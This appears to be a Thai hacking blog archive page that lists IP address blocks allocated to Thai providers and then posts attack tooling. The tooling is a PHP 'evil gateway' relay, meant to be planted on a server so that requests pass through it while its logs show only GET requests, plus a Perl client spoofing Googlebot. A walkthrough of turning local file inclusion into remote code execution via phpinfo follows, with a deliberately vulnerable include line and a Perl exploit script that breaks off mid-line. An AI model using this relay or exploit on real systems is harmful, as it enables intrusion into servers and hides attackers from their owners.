110.164.0.0 - 110.164.15.255 (TH) TRIPLETNET-TH : 3BB Broadband Internet service provider in Thailand
110.168.0.0 - 110.168.127.255 (TH) TRUENET-TH : TRUE BROADBAND--
110.49.0.0 - 110.49.15.255 (TH) TH_AIS_Mobile_Internet : Assign for AIS_Internet Customers
110.77.128.0 - 110.77.159.255 (TH) CAT-BB-NET : 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok Thailand
110.78.0.0 - 110.78.255.255 (TH) CAT : CAT TELECOM Public Company Ltd,CATInternational Telecommunications Service Provider
111.223.32.0 - 111.223.47.255 (TH) PROENNET : Proen Internet, Internet Service Provider, Bangkok, Thailand
111.84.0.0 - 111.84.127.255 (TH) DTAC-GPRS-NET : Total Access Communication PLC
112.121.128.0 - 112.121.159.255 (TH) PROENNET : Proen Internet, Internet Service Provider, Bangkok, Thailand
112.142.0.0 - 112.143.255.255 (TH) TTTNET : Maxnet, Internet Service Provider, Bangkokunder management by TT&T co. ltd Thailand
113.53.0.0 - 113.53.255.255 (TH) TOT-NET : TOT Public Company Limited89/2 Moo 3, Chaengwattana Rd, Tungsonghong, Laksi, BangkokTOT Public Company Limited
114.109.0.0 - 114.109.255.255 (TH) worldinth : Web Hosting & Server Co-locationWorld Internetwork Co.,Ltd , Thailand.World Internetwork Co.,Ltd , Thailand.
114.128.0.0 - 114.128.255.255 (TH) TTTNET : Maxnet, Internet Service Provider, Bangkokunder management by TT&T co. ltd Thailand
115.31.128.0 - 115.31.128.63 (TH) WireAccess-TH : Wire Access(A_Space Project)
115.67.0.0 - 115.67.127.255 (TH) DTAC-GPRS-NET : Total Access Communication PLC.
115.87.0.0 - 115.87.127.255 (TH) TRUEBB-NET : TRUEHISPEED
116.58.224.0 - 116.58.255.255 (TH) HUTCH-WIRELESS : Hutchison CAT Wireless Multimedia Ltd,23rd floor IFCT Tower1768 New Petchburi Road Bangkapi HuaykwangBangkok 10320 THAILAND.
116.68.144.0 - 116.68.159.255 (TH) NTTCTNET : NTT Communications(Thailand) IP NetworkNTT Communications (Thailand) Co., Ltd946 Room 601 Dusit Thani Bldg.Rama IV Road, Silom, BangrakBangkok 10500, Thailand
117.121.208.0 - 117.121.223.255 (TH) BB-BROADBAND-TH : BB BROADBAND CO., LTD.INTERNET SERVICE PROVIDERBANGKOK,THAILAND
117.47.0.0 - 117.47.255.255 (TH) TTTNET : Maxnet, Internet Service Provider, Bangkokunder management by TT&T co. ltd Thailand
118.172.0.0 - 118.172.0.255 (TH) totnet : TOT Public Company Limited BangkokTOT Public Company Limited
119.160.208.0 - 119.160.223.255 (TH) LOXLEYBB : Loxley Wireless Co., Ltd.Internet Service ProviderBangkok,Thailand
119.31.0.0 - 119.31.15.255 (TH) TH_AIS_Mobile_Internet : Assign for AIS_Internet Customers
119.42.64.0 - 119.42.79.255 (TH) CAT-BB-NET : 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok Thailand
119.46.0.0 - 119.46.31.255 (TH) TrueCorporate : True Internet Co., Ltd.
119.63.64.0 - 119.63.71.255 (TH) TH-2S1N : Two S One N Co., Ltd.Internet Service Provider and IT Solutions
119.76.0.0 - 119.76.255.255 (TH) COMNET-TH : KSC Internet Commercial Co., Ltd.Internet Service Provider in Thailand.2/4 Samaggi Insurance Tower, 10th Floor, Vibhabadee-RangsitRoad,Thungsonghong, Laksi, Bangkok 10210.
122.154.0.0 - 122.154.3.255 (TH) HCU-NET : HUACHIEW CHALERMPRAKIET UNIVERSITY18/18, Bangna-Trad Road, k.m.18, Bangplee District Samut Prakarn
123.242.128.0 - 123.242.191.255 (TH) MICT-NET : Ministry of Infomation Communication TechnologyGoverment network provider
124.120.0.0 - 124.120.63.255 (TH) TRUEBB-NET : TRUEHISP
124.122.0.0 - 124.122.127.255 (TH) TRUE_BB : True Internet Co., Ltd.Internet Service Provider.
124.157.128.0 - 124.157.143.255 (TH) TTTNET : Maxnet ISP, Bangkok Thailand, for Dynamic IP pools of ADSL services
124.40.224.0 - 124.40.239.255 (TH) DTACNETWORK-TH : 26th Floor 333/3 Moo 14 Chai Building
125.213.224.0 - 125.213.255.255 (TH) MILCOMNET : Internet Service Provider
125.24.0.0 - 125.25.255.255 (TH) TOTNET-AP : TOT public company limitedTelecommunication Provider, Network Service Provider (NSP)Internet Service Provider (ISP) in ThailandTOT Public Company Limited
125.26.0.0 - 125.26.0.255 (TH) totnet : TOT Public Company Limited BangkokTOT Public Company Limited
180.128.0.0 - 180.128.255.255 (TH) OTAROGNET : OTARO Internet Data Center
180.180.0.0 - 180.180.255.255 (TH) TOT-AS-AP : TOT Public Company LimitedZone A, 6th Floor, Building 1Swicthing and Network Interconnection System Standard SectorTOT Public Company89/2 Moo 3 Chaengwatthana RoadTOT Public Company Limited
202.129.0.0 - 202.129.3.255 (TH) CAT-North : 492 Changmai-Lumpang Road Muang changmai***send spam abuse to cchumpho@cattelecom.co.th***
202.129.32.0 - 202.129.35.255 (TH) CAT-North : 492 Changmai-Lumpang Road Muang changmai***send spam abuse to cchumpho@cattelecom.co.th***
202.133.128.0 - 202.133.143.255 (TH) ClickTA-Ready : IP Pool for Dial up
202.133.144.0 - 202.133.159.255 (TH) ClickTA-Easy : IP Pool for Dial up
202.133.160.0 - 202.133.191.255 (TH) ClickTA-Ready : IP Pool for Dial up
202.139.192.0 - 202.139.223.255 (TH) HUTCH-WIRELESS : Hutchison CAT Wireless Multimedia Ltd,23rd floor IFCT Tower1768 New Petchburi Road Bangkapi HuaykwangBangkok 10320 THAILAND.
202.142.192.0 - 202.142.192.7 (TH) NM-MULTIMEDIA-TH : Network Multimedia Service Co.,LTd.559/103 Lumpini Center E2 6Fl., Happyland1 Rd,
202.143.128.0 - 202.143.159.255 (TH) MOE-NET : Static IP for schools and offices under administrative of Ministry of EducationMinistry of Education Network Operation Center
202.148.176.0 - 202.148.176.127 (TH) Homepro : Home Product center
202.149.96.0 - 202.149.96.63 (TH) ISET-TH : **********************************************abusing network please contact : abuse@ksc.net**********************************************ISET Engineering Co.Ltd128/192 Phayathai Plaza Tower, 18th Floor, Phayathai Road, Thungphayathai, Ratchathevi Bangkok 10400
202.151.176.0 - 202.151.191.255 (TH) SIAMIDC-TH : SIAMIDC,Internet Datacenter , Bangkok, Thailand
202.170.112.0 - 202.170.127.255 (TH) PROENNET : Proen Internet, Internet Service Provider, Bangkok, Thailand
202.173.208.0 - 202.173.223.255 (TH) KIRZ : KIRZ, Internet Service Provider, Bangkok, Thailand
202.176.128.0 - 202.176.191.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
202.176.64.0 - 202.176.127.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
202.182.4.0 - 202.182.31.255 (TH) MILCOMNET : Far East Internet Co., Ltd.
202.183.128.0 - 202.183.128.15 (TH) sts-TH : reassign to "STS Instruments Co., Ltd."contact "unnop@sts.co.th"
202.183.160.0 - 202.183.160.255 (TH) wan-csloxinfo : reassign to "Wan IP for Bangkok"contact "domaster@csloxinfo.net"
202.183.192.0 - 202.183.192.255 (TH) idc-csloxinfo : reassign to "IDC-CBW- IDC customer"contact "dc@csloxinfo.net"
202.183.224.0 - 202.183.224.255 (TH) wan-csloxinfo : reassign to "Wan IP for Bangkok"contact "domaster@csloxinfo.net"
202.28.0.0 - 202.29.255.255 (TH) THAINET-TH : UniNet(Inter-university network)Office of Information Technology Administrationfor Educational DevelopmentMinistry of University Affairs
202.41.160.0 - 202.41.191.255 (TH) RAMKHAMHAENG : 2086 Ramkhamhaeng Rd.,Huamark, Bangkapi,Bangkok
202.43.32.0 - 202.43.47.255 (TH) ISSPNET : Internet Solution & Service Provider Co., Ltd.252/85-86 Muang Thai Phatra OfficeTower II, BB Floor,Ratchadaphisek Road, Huaykwang,Huaykwang, Bangkok 10320
202.44.192.0 - 202.44.255.255 (TH) INET-TH : Internet Thailand Company Limited
202.44.32.0 - 202.44.47.255 (TH) KMUTNB-TH : Computer and Information Technology Center ofKing Mongkut's Institute of TechnologyNorth Bangkok1518 Piboonsongkram Rd.Bangkok 10800
202.47.224.0 - 202.47.225.255 (TH) CAT-corperateService : CAT TELECOM Data Comm. Dept, Intrenet Office***send spam abuse to admin-thix@cat.net.th***
202.57.128.0 - 202.57.191.255 (TH) ISP-TH : Internet Service Provider Co., Ltd.252/85-86 Muang Thai Phatra Office Tower 2BB Floor, Unit A, Ratchadaphisek RoadHuaykwang, Huaykwang, Bangkok 10320Tel +662-305-9900 Fax +662-305-9909
202.5.80.0 - 202.5.95.255 (TH) ISP-TH : Internet Service Provider Co., Ltd.252/85-86 Muang Thai Phatra OfficeTower 2 BB Floor, Unit A,Ratchadaphisek Road, Huaykwang,Huaykwang, Bangkok 10320
202.60.192.0 - 202.60.207.255 (TH) TCC-TH-NET : T.C.C Technology Co., Ltd.Internet Data Centre30th Fl, Park Wing, Empire Tower,195 South Sathorn Rd., Yannawa, SathornBangkok 10120ThailandPhone: +662 751-5200FAX: +662 751-5201
202.71.112.0 - 202.71.115.255 (TH) Phuket-Internet : Phuket Internet
202.80.224.0 - 202.80.251.255 (TH) BuddyB : BuddyB Broadband service network, Advance Datanetwork Communications Co.,Ltd.Internet service provider, Bangkok, Thailand
202.93.48.0 - 202.93.51.255 (TH) TRUENET : VDSL-SME
202.94.240.0 - 202.94.255.255 (TH) UCOMNET : UNITED COMMUNICATION INDUSTRY PCL.Bangkok
203.101.128.0 - 203.101.159.255 (TH) REACH-TH-N1 : REACH Global IP Network - Thailand
203.107.128.0 - 203.107.255.255 (TH) COMNET-TH : KSC Commercial Internet Co. Ltd.2/4 Samaggi Insurance Tower 10th Fl.,Viphavadee-Rangsit RDThungsonghong, LaksiBangkok 10210
203.113.0.0 - 203.113.127.255 (TH) TOTNET-AP : TOT public company limitedTelecommunication Provider, Network Service Provider (NSP)Internet Service Provider (ISP) in ThailandTOT Public Company Limited
203.113.0.0 - 203.113.3.255 (TH) totnet : TOT Public Company Limited BangkokTOT Public Company Limited
203.113.96.0 - 203.113.96.255 (TH) Royal-Thai-Army-Radio-and-Television-CHANNEL-5 : Government Department,Bangkok provinceTOT Public Company Limited
203.114.96.0 - 203.114.127.255 (TH) TOTNET-AP : TOT public company limitedTelecommunication Provider, Network Service Provider (NSP)Internet Service Provider (ISP) in ThailandTOT Public Company Limited
203.118.64.0 - 203.118.127.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
203.121.128.0 - 203.121.128.255 (TH) PI-OFFICE-2031211280-TH : PACNET
203.121.160.0 - 203.121.160.31 (TH) TGPC-20050104-TH : Tipco Group Public Company Limited
203.130.128.0 - 203.130.128.255 (TH) Q-NET : BangkokCorporate Customer of Jasmine Internet
203.131.208.0 - 203.131.223.255 (TH) THAMMASAT : Thammasat University2 Phrachan Road, Phranakorn, Bangkok 10200, Thailand
203.144.128.0 - 203.144.255.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
203.144.192.0 - 203.144.192.255 (TH) AI-WANCUST-ASIANET : ASIANFO-TH Customer Wan Connect
203.146.128.0 - 203.146.128.255 (TH) NATIONSTAT-TH : reassign to "National Statistical Office "
203.146.160.0 - 203.146.160.255 (TH) wan-csloxinfo : reassign to "Wan IP for Bangkok"contact "domaster@csloxinfo.net"
203.146.16.0 - 203.146.16.15 (TH) NPGS-TH : reassign to "Nort Park Golf and Sport Club Co., Ltd."
203.146.192.0 - 203.146.192.255 (TH) gmmgrammy-th : reassign to "GmmGrammy Co., LTD"contact "manat@gmmgrammy.com"
203.146.224.0 - 203.146.224.255 (TH) DIMLERCH-TH : reassign to "Dimler Chryler"
203.146.32.0 - 203.146.32.31 (TH) kce-tech-TH : reassign to "KCE Technology Co.,Ltd."contact "w.surachai@kce-tech.co.th"
203.146.64.0 - 203.146.64.31 (TH) csloxinfo-th : reassign to "Network Management"contact "domaster@csloxinfo.net"
203.146.96.0 - 203.146.96.255 (TH) wan-csloxinfo : reassign to "Wan IP for Bangkok"contact "domaster@csloxinfo.net"
203.147.0.0 - 203.147.63.255 (TH) JINET-TH : Jasmine Internet (Thailand) Co,.Ltd.200 8th Floor , Chaengwatana Road , Pakkred,Nonthabury, 11120
203.147.32.0 - 203.147.33.255 (TH) SUT : Corporate Customer of Jasmine InternetNakhonratchasima, Thailand
203.148.128.0 - 203.148.255.255 (TH) ANET-TH : A-Net Co., Ltd.Internet Service Provider In Thailand23 Soi Charoen Nakorn 14, Charoen Nakorn Rd.,Klongtonsai , Klongsan , Bangkok 10600 ,Thailand
203.149.0.0 - 203.149.63.255 (TH) SAMART-TH : Samart Corporation Co., Ltd.99/6 Software Park Tower,30th Fl. Chaengwattana Rd.Klong Gluar, Pak-Kred, Nonthaburi 11120 Thailand
203.150.0.0 - 203.150.3.255 (TH) INET-TH : E-mail & Webhosting service segmentInternet Thailand Company Limited
203.150.128.0 - 203.150.255.255 (TH) INET-TH : Internet Thailand Company Limited
203.151.0.0 - 203.151.0.31 (TH) BPE-TH : Bangkok Polyethylene Public Company Limited
203.151.0.0 - 203.151.255.255 (TH) INET-TH : Internet Thailand Company Limited
203.153.128.0 - 203.153.143.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.For Infrastructure Cable Modem service True Internet Co., Ltd.
203.153.160.0 - 203.153.191.255 (TH) ISP-TH : Internet Service Provider Co., Ltd.252/85-86 Muang Thai Phatra OfficeTower 2 BB Floor, Unit A,Ratchadaphisek Road, Huaykwang,Huaykwang, Bangkok 10320
203.154.0.0 - 203.154.255.255 (TH) INET-TH : Internet Thailand Company Limited
203.155.0.0 - 203.155.255.255 (TH) COMNET-TH : KSC Commercial Internet Co. Ltd.2/4 Samaggi Insurance Tower 10th Fl.,Viphavadee-Rangsit RDThungsonghong, LaksiBangkok 10210
203.156.0.0 - 203.156.127.255 (TH) JI-NET : Jasmine Internet Co., Ltd.200 Moo 4, Chaengwatthana RD., Pakkred Sub-DistrictsPakkred, Nonthaburi. 11120
203.156.128.0 - 203.156.135.255 (TH) TTTNET : Corporate CustomerBangkokJasmine Internet Co.,Ltd.
203.156.64.0 - 203.156.65.255 (TH) ADSL : ADSL UserBangkokCorporate of Jasmine Internet (Thailand)Co.,Ltd.
203.157.0.0 - 203.157.255.255 (TH) MOPH-TH : Information Technology OfficeThe Permanent Secretary Office,Ministry of Public Health, Thailand
203.158.96.0 - 203.158.255.255 (TH) RIT-TH : Rajamangala Institute of TechnologyInstitute of Information TechnologyRIT center, Pathum Thani
203.159.0.0 - 203.159.255.255 (TH) AIT-TH : Asian Institute of TechnologyBangkok
203.170.128.0 - 203.170.255.255 (TH) CSC : CS LoxInfo Public COmpany Limited973 President Tower11th Floor, Ploenchit RoadLumpini Pathumwan, Bangkok 10330
203.170.192.0 - 203.170.192.255 (TH) idc-csloxinfo : reassign to "IDC Cyberworld (IDC Customer)"contact "dc@csloxinfo.net"
203.172.128.0 - 203.172.191.255 (TH) MOE-NET : Static IP for schools and offices under administrative of Ministry of EducationMinistry of Education Network Operation Center
203.172.32.0 - 203.172.63.255 (TH) CSC : CS LoxInfo Public COmpany Limited973 President Tower11th Floor, Ploenchit RoadLumpini Pathumwan, Bangkok 10330
203.172.64.0 - 203.172.127.255 (TH) CSC : CS LoxInfo Public COmpany Limited973 President Tower11th Floor, Ploenchit RoadLumpini Pathumwan, Bangkok 10330
203.185.128.0 - 203.185.159.255 (TH) SCHOOLNET-TH : Non-Commercial Internet ProvidersFor School in ThailandNational Electronics and Computer Technology Center(NECTEC)
203.185.64.0 - 203.185.95.255 (TH) THAISARN-TH : Non-Commercial Internet ProvidersFor ThaiSARN in ThailandNational Electronics and Computer Technology Center(NECTEC)
203.185.96.0 - 203.185.127.255 (TH) THAISARN-TH : Non-Commercial Internet ProvidersFor ThaiSARN in ThailandNational Electronics and Computer Technology Center(NECTEC)
203.188.0.0 - 203.188.63.255 (TH) COMNET-TH : KSC Internet Commercial Co., Ltd.Internet Service Provider in Thailand.2/4 Samaggi Insurance Tower, 10th Floor, Vibhabadee-Rangsit Road,Thungsonghong, Laksi, Bangkok 10210.
203.192.32.0 - 203.192.47.255 (TH) IPSTAR-GW : THAICOM Public Company LimitedInternet via IPSTAR SatelliteNonthaburi bangkok - 11000
203.192.48.0 - 203.192.63.255 (TH) IPSTAR-GW : THAICOM Public Company LimitedInternet via IPSTAR SatelliteNonthaburi bangkok - 11000
203.195.96.0 - 203.195.111.255 (TH) COMNET-TH : KSC Commercial Internet Co. Ltd.2/4 Samaggi Insurance Tower 10th Fl.,Viphavadee-Rangsit RDThungsonghong, LaksiBangkok 10210
203.209.0.0 - 203.209.127.255 (TH) COMNET-TH : KSC Commercial Internet Co. Ltd.2/4 Samaggi Insurance Tower 10th Fl.,Viphavadee-Rangsit RDThungsonghong, LaksiBangkok 10210
203.78.96.0 - 203.78.111.255 (TH) NETWAY-TH : Netway Communication Co.,Ltd.72 4th Floor, Telecom Tower, Charoen Krung Road,Bangrak, Bangkok 10500,ThailandTel (662) 639-7700 Fax: (662) 639-7706
210.1.0.0 - 210.1.0.255 (TH) csloxinfo-th : reassign to "IDC-CBW Server Farm and Corporate network infrastructure"contact "dc@csloxinfo.net"
210.203.128.0 - 210.203.191.255 (TH) ANET-TH : ANET Co.,Ltd.Internet Service Provider In Thailand23 Soi Charoen Nakorn 14,Charoen Nakorn Rd.,Klongsan ,Bangkok 10600
210.213.0.0 - 210.213.31.255 (TH) TRUENET : TruehispHuaweiBBCustomer LAN
210.246.64.0 - 210.246.255.255 (TH) SIF : Samart Infonet Co., Ltd., Internet Service Provider, Thailand
210.4.128.0 - 210.4.128.255 (TH) DKSH-TH : reassign to "Diethelm &Co., Ltd."contact "noc.bkk@dksh.com"
210.86.128.0 - 210.86.191.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
210.86.192.0 - 210.86.223.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
221.128.64.0 - 221.128.64.255 (TH) PIC3-20050216-TH : Prachinburi Internet Co., Ltd
222.123.0.0 - 222.123.255.255 (TH) TTTNET : Maxnet, Internet Service Provider, Bangkokunder management by TT&T co. ltd Thailand
58.10.0.0 - 58.10.255.255 (TH) TRUENET : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
58.136.0.0 - 58.136.0.255 (TH) csloxinfo-th : reassign to "CSLOXINFO ADSL Dynamic IP"contact "domaster@csloxinfo.net"
58.137.0.0 - 58.137.0.15 (TH) regional-TH : reassign to "Regional Medical Science Center,Khonkean"contact "dfweeeeee@csloxinfo.net"
58.147.0.0 - 58.147.127.255 (TH) TTTNET : Maxnet, Internet Service Provider, Bangkokunder management by TT&T co,.ltd Thailand
58.181.128.0 - 58.181.255.255 (TH) COMNET-TH : KSC Internet Commercial Co., Ltd.Internet Service Provider in Thailand.2/4 Samaggi Insurance Tower, 10th Floor, Vibhabadee-RangsitRoad,Thungsonghong, Laksi, Bangkok 10210.
58.64.0.0 - 58.64.0.255 (TH) IDC_Secure_FW_IPS : Assign for IDC secure zone
58.8.0.0 - 58.8.255.255 (TH) TRUENET : ADSL HuaweiBB Truehisp Infrastructure True internet Co., Ltd.
58.97.0.0 - 58.97.63.255 (TH) TRUE-Corporate : Fix ip for coporate customer
61.19.0.0 - 61.19.15.255 (TH) CAT-IIGservice : CAT TELECOM Data Comm. Dept, Intrenet Office***send spam abuse to admin-thix@cat.net.th***
61.19.128.0 - 61.19.143.255 (TH) CAT-ATM-Service : CAT TELECOM Data Comm. Dept, Intrenet Office***send spam abuse to admin-thix@cat.net.th***
61.19.64.0 - 61.19.67.255 (TH) CAT-CDMA-NET : CAT Wireless 99 Moo 3 Chaeng Watthana Road Bangkok
61.47.0.0 - 61.47.127.255 (TH) PACNET :
61.7.128.0 - 61.7.191.255 (TH) CAT-BB-NET : 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok Thailand
61.90.0.0 - 61.90.68.255 (TH) HUAWEI-TRUEHISP-ASIANET : For ADSL Service (TrueHISP)Equipment is HuaweiASIAINFO-TH InfrastructureAsianet Corperation
61.90.0.0 - 61.91.255.255 (TH) TRUENET-TH : True Internet Co., Ltd.Internet Service ProviderBangkok, Thailand.
61.91.160.0 - 61.91.167.255 (TH) TRUE-Corporate : Fix ip for coporate customer
61.91.192.0 - 61.91.223.255 (TH) TRUE1 : Fix ip for coporate customer
Monthly Archives: September 2011
all major IP addresses blocks allocated for Thailand
Filed under เรื่อยเปื่อย บ่นๆ ไร้สาระมั่ง ไม่ไร้สาระมั่ง
[php] fsock gateway v.1 [GET method fsock proxy (ใช้ $_SERVER)]
Filed under รวม code ทั้งมั่วเอง ทั้งจิ๊กชาวบ้านมา
[thdz] fsock gateway v.1
- รองรับ Cookie
- รองรับ Agent
- รองรับ GET/POST
- acc log ของเครื่องที่วางไว้ จะเป็น get ตลอด (ตรวจยาก)
วิธีใช้
-เอาไปวาง
-เวลาใช้ ส่งค่า get/post ของ link เป้าหมายใน HEADER ( $_SERVER['HTTP_TARGET'], $_SERVER['HTTP_POSTDATA'] )
shell.pl (Remote Evil Request)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | #!/usr/bin/perl -w use HTTP::Cookies; use LWP::UserAgent; my $TARGET = 'http://acenetglobal.info/phpinfo.php'; my $POSTDATA = 'arg1=1&arg2=2&arg3=3'; my $GATEWAY = 'http://localhost/sock.php';#change this :P my $cookie_jar = HTTP::Cookies->new(autosave =>1, hide_cookie2=>1); my $browser = LWP::UserAgent->new( agent => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', cookie_jar=> $cookie_jar, ); $browser->default_header('TARGET'=>$TARGET); $browser->default_header('POSTDATA'=>$POSTDATA) if($POSTDATA); my $content = $browser->get($GATEWAY)->content; print "$content\n"; |
sock.php (evil gateway)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 | <? /****************************** [thdz] fsock gateway v.0.1 ******************************/ if(!empty($_SERVER['HTTP_TARGET'])){ @set_time_limit(0); @error_reporting(0); @ob_implicit_flush(1); @ignore_user_abort(0); $URL = preg_replace('/^http(s)?:\/\/(.*)$/i', "$2", $_SERVER['HTTP_TARGET']); echo browser_req($URL, $_SERVER['HTTP_POSTDATA']); } class Browser { function _req($URL, $DATA){ list($web, $path)=explode("/", $URL, 2); list($host, $port)=explode(":", $web, 2);if(!$port) $port ='80'; $socket = @fsockopen($host, $port, $errno, $errstr, 30); if(!$socket){ die("[!] $errstr $errno"); }else{ $req = (!empty($DATA))?"POST":"GET";$req .= " /${path} HTTP/1.1\r\n"; $req .= "Host: ${host}";if($port != 80) $req .= ":${port}";$req .= "\r\n"; $req .= "User-Agent: ".$_SERVER["HTTP_USER_AGENT"]."\r\n"; if(!empty($_SERVER["HTTP_COOKIE"])) $req .= "Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n"; $req .= "Content-Type: ";$req .= (!empty($DATA))?"application/x-www-form-urlencoded":"text/html";$req .= "\r\n"; if(!empty($DATA)) $req .= "Content-Length: ".strlen($DATA)."\r\n"; $req .= "Connection: Close\r\n\r\n"; if(!empty($DATA)) $req .= $DATA; fwrite($socket, $req); while(!feof($socket)) $resp .= fgets($socket, 1024); fclose($socket); $return = substr($resp, (strpos($resp, "\r\n\r\n")+4)); if(strpos(strtolower($resp), "transfer-encoding: chunked") !== FALSE) return ($this->http_chunked_decode($return)); return $return; } } function http_chunked_decode($chunk){ $pos = 0; $len = strlen($chunk); $dechunk = null; while(($pos < $len) && ($chunkLenHex = substr($chunk,$pos, ($newlineAt = strpos($chunk,"\n",$pos+1))-$pos))){ if (!$this->is_hex($chunkLenHex)) { trigger_error('Value is not properly chunk encoded', E_USER_WARNING); return $chunk; } $pos = $newlineAt + 1; $chunkLen = hexdec(rtrim($chunkLenHex,"\r\n")); $dechunk .= substr($chunk, $pos, $chunkLen); $pos = strpos($chunk, "\n", $pos + $chunkLen) + 1; } return $dechunk; } function is_hex($hex) { $hex = strtolower(trim(ltrim($hex,"0"))); if (empty($hex)) { $hex = 0; }; $dec = hexdec($hex); return ($hex == dechex($dec)); } } function browser_req($URL, $DATA=''){ $browser = new Browser; return $browser->_req($URL, $DATA); } ?> |
ชำแหละ LFI With PHPInfo Assistance
#########################
# LFI With PHPInfo Assistance
# POC -> http://www.exploit-db.com/download_pdf/17799
[คหสต.]
ช่องโหว่ ทาง LFI เนี่ย เป็นมุขแฮกเวปที่เก่ามากแล้ว (ตั้งแต่ php 4+)
พอ php 5 มา .. คนก็ไปใช้ function file_get_contents แทน include ซะหมด
ดังนั้น LFI จะหาแฮกยากหน่อย .. ( แต่ส่วนมาก sv ของเกาหลียังพอจะหาเวปที่รั่ว แนวๆ นี้ได้อยู่บ้าง )
ซึ่งตามปกติ LFI จะเป็นการ เรียก file อื่นมาอ่าน เช่น /etc/passwd หรือ wp-config.php ทั่วๆ ไปเป็นต้น
ซึ่งช่องโหว่ LFI เนี้ยไม่สามารถ สั่ง คำสั่ง command line ได้ … (แต่ มันก็ยังพอจะมีวิธี ^^”)
และเจ้า LFI With PHPInfo Assistance ก็เป็น หนึ่ง ในวิธี ที่พูดถึง (วิธีอื่น อย่าถาม .. ผมไม่ตอบ เพราะผมกั๊ก *0*)
#########################
# เงื่อนไขหลักๆ (ผมก็ไม่ค่อย แน่ใจนะ ว่า จำกัด version ของ php รึเปล่า )
1. มีหน้า phpinfo ( เพราะจะต้องใช้คำสั่ง จาก ฟังชั่น นี้ )
phpinfo.php
<? phpinfo();?>
2. มีหน้าที่ รั่ว LFI ( ตอนนี้หายากแล้วล่ะมั้ง T^T )
lfi.php
<?include($_GET['page']);?>
3. ค่าใน php.ini ต้องตั้ง file_uploads = On (ปกติ ก็น่าจะเป็น On หมดนั่นแหละ)
#########################
# หลักการ
ตามปกติ หากเรา ทำการ upload file ใน php เนี้ย
พวก file ที่เรา upload ขึ้นไปนั้นจะถูกเขียน ลงใน temp ก่อน
(ดูตรง upload_tmp_dir อ่ะ .. ปกติมันจะว่าง ก็เดาซะว่าอยู่ที่ /tmp แล้วกัน)
พอ upload ขึ้นไปปุ๊ป เจ้า php จึงจะ ย้ายมาไว้ใน ตำแหน่งที่เราระบุไว้
ซึ่งชื่อ ใน temp ก็จะสุ่มมั่วๆ ซะด้วย และไฟล์ ก็จากหายไปจาก temp อัตโนมัติ
เมื่อหมด session ( ประมาณว่า เมื่อหน้า page นั้นโหลดเสร็จ .. ไฟล์มันจะหายไปเองจาก /tmp )
ทีนี้ หากเราทำการ upload file ที่มี evil code ขึ้นเวป เพื่อที่จะให้สามารถสั่ง exec ได้
เจ้า file โจรๆ ของเรามันก็จะต้องไปอยู่ใน temp จนกว่าหน้าเวปนั้นจะโหลดเสร็จ … จริงมั้ย ?
ทีนี้ หากเราสั่งให้ lfi.php มันดึง file โจรๆ ที่เรา upload ขึ้นไป
จาก LFI ธรรมดา มันก็จะกลายไปเป็น Remote Exec ทันที … จริงมั้ย ?
#########################
# คำถามที่คนอ่าน ที่ชอบเรื่องแฮกๆ จะต้องผุดขึ้นมา คือ
- ทำไง ถึงจะรู้ว่า File ที่ อัพไป .. ชื่อไฟล์อะไร .. ในเมื่อ ก็บอกอยู่ว่ามันสุ่ม !!
คำตอบคือ .. มันจะบอกอยุ่ใน phpinfo.php ตรงค่า “PHP Variables” ไง
- ทำไงให้ file นั้น อยู่นานๆ … นาน น๊าน นาน นาน นานนนนนน พอที่จะรันคำสั่งเสร็จ ก่อนที่จะโดนลบ?
คำตอบคือ .. ทำให้ฟังชั่น phpinfo(); ทำงาน นานๆ
โดยการ ส่ง junk code ไปเยอะๆ เช่น ส่งไปใน header, ในค่า post, ใน ค่า file upload, ฯลฯ
#########################
# Exploit Code –> [perl] http://pastebin.com/2m6mz8Mz
- fake header z (ส่ง HEADER Z ไป 3000 ตัวอักษร)
- ส่ง file ไป 40 file (ชื่อไฟล์ คือ จำนวนที่ N ตามด้วย > ยาว 100000 ตัวอักษร)
เท่านี้ code ที่สั่ง run ก็จะ ทำงาน แล้ว นั่นเอง *0*
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 | #!/usr/bin/perl -w use IO::Socket; use MIME::Base64; use HTTP::Cookies; use LWP::UserAgent; my $HOST=''; my $PATH=''; my $LFI_URL= $ARGV[1] || 'http://localhost/lfi.php?page='; my $COMMAND= $ARGV[2] || 'system("uname -a");'; $COMMAND = encode_base64($COMMAND); $COMMAND =~s/\s+//ig; if($ARGV[0]=~m#http://([^/]+)(/.+)#){ $HOST=$1; $PATH=$2; }else{ die "[!] wrong host !?\n"; } my $CRLF = "\r\n"; my $SOCK = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $HOST, PeerPort => 80, ) or die ("[!] Can't creat socket\n"); setsockopt($SOCK, SOL_SOCKET, SO_RCVBUF,pack("I",'1024')); $SOCK->autoflush(1); my $BOUNDARY = "-----whoami".int(rand(9999)); my $HEADER .= 'POST '.$PATH.' HTTP/1.0'.$CRLF; $HEADER .= 'Host: '.$HOST.$CRLF; $HEADER .= 'User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'.$CRLF; $HEADER .= 